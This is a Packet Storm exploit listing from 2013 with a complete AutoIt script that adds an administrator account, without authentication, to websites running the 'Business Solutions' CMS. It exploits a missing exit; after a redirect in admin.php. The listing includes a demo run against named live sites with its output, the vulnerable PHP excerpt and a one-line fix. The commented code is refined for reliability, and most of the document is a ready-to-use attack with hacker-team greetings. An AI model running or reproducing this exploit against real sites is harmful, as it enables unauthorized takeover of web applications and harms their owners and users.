Business Solutions CMS Add Admin

2013-01-10T00:00:00
ID PACKETSTORM:119500
Type packetstorm
Reporter Akastep
Modified 2013-01-10T00:00:00

Description

                                        
                                            `#cs  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm AkaStep member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
bs_am_remote_add_admin.au3  
  
  
BS.AM (BUSINESS SOLUTIONS) CMS REMOTE ADD ADMIN EXPLOIT.  
THIS EXPLOIT IS WRITTEN IN THE AUTOIT SCRIPTING LANGUAGE.  
ON SUCCESSFUL REMOTE EXPLOITATION IT ADDS A NEW ADMIN ACCOUNT TO THE TARGET SITE, WITHOUT ANY PRIOR LOGIN.  
  
***** THIS IS A WHOLE EXPLOIT! *****  
THANK YOU!  
  
FEW DEMOS:  
  
http://asba.am  
http://doors.am  
  
  
  
DEMO USAGE:  
  
>poc.exe http://asba.am bigbang bigbang  
  
  
##############################################################  
(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8)  
Usage: poc.exe http://site.tld username password  
[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]  
[@@@] Vuln & Exploit By AkaStep [@@@]  
##############################################################  
[+] GETTING INFO ABOUT CMS [+]  
[*] GOT Response : Yes! It is exactly that we are looking for! [*]  
  
##################################################  
Trying to add new admin:  
To Site:www.asba.am  
With Username: bigbang  
With Password: bigbang  
##################################################  
  
##################################################  
Exploit Try Count:1  
##################################################  
Error Count: 0  
##################################################  
  
##################################################  
Exploit Try Count:2  
##################################################  
Error Count: 0  
##################################################  
Count of errors during exploitation : 0  
  
##################################################  
[*] Seems we are going to travel xD. [*]  
Try to login @  
Site: asba.am/cms/index.php  
With Username: bigbang  
With Password: bigbang  
##################################################  
[*] Exit [*]  
##################################################  
  
  
  
  
  
  
  
  
VULNERABLE CODE:  
NOTICE: admin.php keeps executing after header("Location: index.php") because no exit; follows it. header() only queues a response header - PHP does not stop - so for a visitor without a session ($_SESSION['login11_error'] unset, hence != "no") the redirect is sent AND the rest of admin.php, including whatever handles the ?page=security form this exploit posts to, still runs. The fix is exit; (or die();) immediately after the header() call.  
FUNNY TO SEE HOW MANY PROGRAMMERS FAILS TO UNDERSTAND THIS;)  
  
//cms/admin.php  
  
============SNIP BEGINS============  
<?  
session_start();  
if ($_SESSION['login11_error'] != "no")  
header("Location: index.php");  
include 'config.php';?>  
<!DOCTYPE html  
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"  
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">  
<html>  
<head>  
<title>cms::</title>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">  
<link rel="stylesheet" type="text/css" href="css/main.css" />  
<script type="text/javascript" src="javascript/jquery-1.4.2.js"></script>  
  
<script type="text/javascript" src="javascript/admin.js"></script>  
<script type="text/javascript" src="javascript/jquery-ui-1.8.11.custom.min.js"></script>  
<script type="text/javascript" src="javascript/jquery.ui.datepicker-hy.js"></script>  
  
<script type="text/javascript" src="javascript/jquery.lightbox-0.5.js"></script>  
<link type="text/css" href="css/jquery-ui-1.8.11.custom.css" rel="stylesheet" />  
</head>  
<body>  
<div id="header">  
  
============SNIP ENDS HERE===========  
  
  
  
#ce  
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****  
#AutoIt3Wrapper_UseUpx=n  
#AutoIt3Wrapper_Change2CUI=y  
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****  
#NoTrayIcon  
#include "WinHttp.au3"  
#include <inet.au3>  
#include <String.au3>  
  
; Console banner: a 62-character rule, the tool name, the usage line and the
; author tag, closed by another 62-character rule. Printed once at start-up.
Global $exploitname = @CRLF & _StringRepeat('#', 62) & @CRLF _
        & '(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF _
        & 'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & @CRLF _
        & "[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]" & @CRLF _
        & '[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF _
        & _StringRepeat('#', 62)
ConsoleWrite(@CRLF & $exploitname & @CRLF)
  
; Request parameters for the unauthenticated admin-creation POST.
Global $method = 'POST'
Global $vulnurl = 'cms/admin.php?lang=en&page=security'

; Attempt and failure counters; both are handed to priv8() and updated there.
Global $count = 0
Global $error = 0

; Fingerprint: the page fetched from $adminpanel is expected to contain this
; file name when the target runs the CMS this tool is written for.
Global $cmsindent = 'CaptchaSecurityImages.php'

; Path of the admin login page, used for the fingerprint fetch and for the
; login hint printed at the end.
Global $adminpanel = '/cms/index.php'
  
; Exactly three arguments are required: target URL, new admin user name and
; password. Any other count shows the usage box and ends the script.
If $CmdLine[0] <> 3 Then
    MsgBox(64, "", "Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://www.site.tld ' & ' username ' & 'password' & @CRLF)
    Exit
EndIf

Global $targetsite = $CmdLine[1]
Global $username = $CmdLine[2]
Global $password = $CmdLine[3]

; An argument that is empty once all whitespace is removed (StringStripWS
; flag 8 strips every whitespace character, not only the ends) is refused.
If StringStripWS($targetsite, 8) = '' _
        Or StringStripWS($username, 8) = '' _
        Or StringStripWS($password, 8) = '' Then
    ConsoleWrite('Are you kidding me?')
    Exit
EndIf
  
  
  
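; Reachability probe: fetch the target root into memory (option 1 = bypass
; the local cache) and stop when nothing comes back. Nothing is written to
; disk; the downloaded bytes are discarded.
InetRead($targetsite, 1)
If @error Then
    ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
    Exit
EndIf

ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF)
; Short random pause between the probe and the fingerprint fetch.
Sleep(Random(1200, 2500, 1))

; Fingerprint: the admin login page is fetched with the URL exactly as given
; on the command line (so the scheme, e.g. http://, must be part of it) and
; searched for the file name in $cmsindent. A mismatch counts as one error -
; the POST is still sent, but the final verdict will then read "not
; exploitable / try anyway" even if the request is accepted.
Global $sidentify = _INetGetSource($targetsite & $adminpanel, True)
If StringInStr($sidentify, $cmsindent) Then
    ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
    ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
    $error += 1
EndIf

; Reduce the URL to a bare host name for _WinHttpConnect(): drop the scheme
; (http:// or https://), everything from the first '/' on, and an existing
; "www." before the prefix is added back - prepending "www." to a host that
; already carried it sent the request to www.www.<host> and produced a false
; "not exploitable" verdict. The bare host is later used for plain HTTP on
; port 80; https:// targets are not supported by this tool.
Global $sHost = StringRegExpReplace($targetsite, '(?i)^\s*https?://', '')
$sHost = StringRegExpReplace($sHost, '(?s)/.*', '')
$sHost = StringRegExpReplace($sHost, '(?i)^www\.', '')
$targetsite = 'www.' & $sHost

; Never returns: priv8() ends the script after printing its verdict.
priv8($targetsite, $username, $password, $count, $error)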
  
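; Post the add-admin form to the target, print the verdict and end the script.
; The first call receives the host with a "www." prefix; when that attempt
; yields no reply or an HTTP error (status >= 400) the function recurses once
; with the prefix removed, so at most two requests are sent. (The previous
; version tested the attempt counter before sending, so the fallback host was
; never actually tried and a target served only without "www." always came
; out as "not exploitable".)
;   $targetsite - bare host name (no scheme, no path), "www." prefix optional
;   $username   - admin user name to create
;   $password   - password for that user (also sent as rewrite_password)
;   $count      - attempts made before this call (0 on the first call)
;   $error      - failures recorded so far; a fingerprint mismatch in the
;                 caller arrives as 1 and selects the "try anyway" wording
; Reads the script globals $adminpanel, $method and $vulnurl (the latter two
; through __BsamPostAddAdmin). Never returns: every path ends in Exit.
; NOTE(review): a vulnerable admin.php answers this POST with the redirect it
; queues before continuing, so a 2xx/3xx reply only shows the request was
; accepted - it does not prove the account exists. Logging in at $adminpanel
; is the only real confirmation.
Func priv8($targetsite, $username, $password, $count, $error)
    $count += 1

    Local $triptrop = @CRLF & _StringRepeat('#', 50) & @CRLF
    If $count <= 1 Then
        ConsoleWrite($triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & _
                'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop)
    EndIf
    ConsoleWrite($triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count: ' & $error & $triptrop)

    ; Every field is percent-encoded so a user name or password containing
    ; '&', '=', '%' or '+' cannot split or corrupt the form body.
    Local $sPostData = 'username=' & __BsamUrlEncode($username) & _
            '&password=' & __BsamUrlEncode($password) & _
            '&rewrite_password=' & __BsamUrlEncode($password) & _
            '&ifsubmit=yes'

    Local $iStatus = __BsamPostAddAdmin($targetsite, $sPostData)
    Local $bFailed = ($iStatus = 0 Or $iStatus >= 400)

    If $bFailed And $count < 2 And StringLeft($targetsite, 4) = 'www.' Then
        ; No usable reply on the www. host: try the bare host once.
        ConsoleWrite('[*] No usable reply from ' & $targetsite & ' (HTTP status ' & $iStatus & '). Retrying without the www. prefix. [*]' & @CRLF)
        Sleep(1500)
        priv8(StringTrimLeft($targetsite, 4), $username, $password, $count, $error)
        Exit ; not reached - the nested call ends the script - kept so no path falls through
    EndIf

    If $bFailed Then $error += 1
    ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)

    If Int($error) = 0 Then
        ConsoleWrite($triptrop & '[*] Seems we are going to travel xD. [*]' & @CRLF & _
                'Try to login @ ' & @CRLF & _
                'Site: ' & $targetsite & $adminpanel & @CRLF & _
                'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop)
    Else
        ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _
                '[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
                '[*] May be you are Lucky;) [*]' & @CRLF & _
                'Try to login @ ' & @CRLF & _
                'Site: ' & $targetsite & $adminpanel & @CRLF & _
                'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop)
    EndIf
    Exit
EndFunc   ;==> priv8

; Send one application/x-www-form-urlencoded POST of $sPostData to
; http://$sHost/$vulnurl (script globals $method and $vulnurl) and return the
; HTTP status code of the reply, or 0 when the connection, the request or the
; response failed. Every WinHttp handle that was opened is closed before
; returning. Plain HTTP on port 80 only: _WinHttpConnect() gets a bare host.
Func __BsamPostAddAdmin($sHost, $sPostData)
    Local $iStatus = 0

    Local $hOpen = _WinHttpOpen("Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325)")
    If @error Then Return 0

    Local $hConnect = _WinHttpConnect($hOpen, $sHost)
    If @error Then
        _WinHttpCloseHandle($hOpen)
        Return 0
    EndIf

    Local $hRequest = _WinHttpOpenRequest($hConnect, $method, $vulnurl, Default, Default, '')
    If @error Then
        _WinHttpCloseHandle($hConnect)
        _WinHttpCloseHandle($hOpen)
        Return 0
    EndIf

    ; Content-Length is computed by WinHttp when -1 is passed to
    ; _WinHttpSendRequest(); Accept-Encoding is deliberately not offered
    ; because the body is never decompressed or inspected.
    _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5")
    _WinHttpAddRequestHeaders($hRequest, "DNT: 1")
    _WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")

    If _WinHttpSendRequest($hRequest, -1, $sPostData) Then
        If _WinHttpReceiveResponse($hRequest) Then
            ; The status is taken from the raw header block so that a reply
            ; with an empty body (e.g. a bare 302) still counts as an answer;
            ; the old "is any body data available" test treated it as failure.
            $iStatus = __BsamStatusCode(_WinHttpQueryHeaders($hRequest))
            ; Drain the body; its content is not interpreted.
            Do
                _WinHttpReadData($hRequest)
            Until @error
        EndIf
    EndIf

    _WinHttpCloseHandle($hRequest)
    _WinHttpCloseHandle($hConnect)
    _WinHttpCloseHandle($hOpen)
    Return $iStatus
EndFunc   ;==> __BsamPostAddAdmin

; Extract the three-digit status code from a raw response header block
; ("HTTP/1.1 302 Found" ...). Returns 0 when no status line is found.
Func __BsamStatusCode($sRawHeaders)
    Local $aMatch = StringRegExp($sRawHeaders, '(?i)^HTTP/\d(?:\.\d)?\s+(\d{3})', 1)
    If @error Then Return 0
    Return Int($aMatch[0])
EndFunc   ;==> __BsamStatusCode

; Percent-encode one form value: RFC 3986 unreserved characters
; (A-Z a-z 0-9 - . _ ~) pass through, every other byte - including '&', '=',
; '%', '+', whitespace and non-ASCII text, which is sent as UTF-8 - becomes
; %XX. Keeps a user name or password from breaking the POST body apart.
Func __BsamUrlEncode($sText)
    Local $bUtf8 = StringToBinary($sText, 4) ; 4 = UTF-8
    Local $sOut = ''
    Local $sHex, $sChar
    For $i = 1 To BinaryLen($bUtf8)
        $sHex = Hex(BinaryMid($bUtf8, $i, 1)) ; two upper-case hex digits
        $sChar = Chr(Dec($sHex))
        If StringRegExp($sChar, '^[A-Za-z0-9._~-]\z') Then
            $sOut &= $sChar
        Else
            $sOut &= '%' & $sHex
        EndIf
    Next
    Return $sOut
EndFunc   ;==> __BsamUrlEncode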
  
  
#cs  
  
================================================  
KUDOSSSSSSS  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
  
to all Aa Team + to all Azerbaijan Black HatZ  
+ *Especially to my bro CAMOUFL4G3 *  
To All Turkish Hackers  
  
Also special thanks to: ottoman38 & HERO_AZE  
================================================  
  
/AkaStep  
  
#ce  
`